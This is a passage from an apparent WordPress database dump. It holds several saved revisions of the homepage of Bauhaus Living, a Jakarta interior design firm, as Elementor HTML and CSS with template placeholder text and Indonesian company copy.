href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:30:04','2023-09-22 09:30:04','',22,'https://bauhaus.futuremediatrix.com/?p=4895',0,'revision','',0),(4896,3,'2023-09-22 09:30:04','2023-09-22 09:30:04','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 09:30:04','2023-09-22 09:30:04','',22,'https://bauhaus.futuremediatrix.com/?p=4896',0,'revision','',0),(4897,3,'2023-09-22 09:30:05','2023-09-22 09:30:05','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>\"Let\'s turn your ideas into reality\"</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link 